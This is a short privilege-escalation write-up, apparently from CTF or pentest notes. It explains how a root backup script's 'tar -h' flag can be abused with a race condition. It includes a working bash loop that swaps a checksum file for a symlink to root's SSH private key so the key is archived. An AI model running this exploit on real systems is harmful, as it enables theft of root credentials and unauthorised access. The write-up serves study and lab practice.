Tar Symlink Exploitation (Linux)
Post

Tar Symlink Exploitation (Linux)

Abusing dereference

Reviewing the code inside we get this:

1
2
3
4
5
6
7
8
9
#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*

As we can notice there is a stranger flag within the latest tar command which is -h:

1
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"

After reading the manual for tar, we can see that this flag is used to follow symlink and dump the file that is pointing to:

1
2
3
4
5
6
7
8
9
10
			 --exclude-vcs-ignores
		      Exclude files that match patterns read from VCS-specific ignore files.
					Supported  files  are:  .cvsignore,  .gitignore,
              .bzrignore, and .hgignore.

       -h, --dereference
              Follow symlinks; archive and dump the files they point to.

       --hard-dereference
              Follow hard links; archive and dump the files they refer to.

With this in mind then we can start a race condition to delete the checksum file which is being generated and then insert our symlink pointing to an interesting file that allow us to escalate privileges (root id_rsa for example):

First we need to create a script that checks when the file checksum is generated, remove it and create our symlink instead of it pointing to the id_rsa from root, exactly like this:

1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash

while true
do
        if [ -e /opt/backups/checksum ]
        then
                rm -rf /opt/backups/checksum
                ln -s /root/.ssh/id_rsa /opt/backups/checksum
                break;
        fi
done

Examples: Epsilon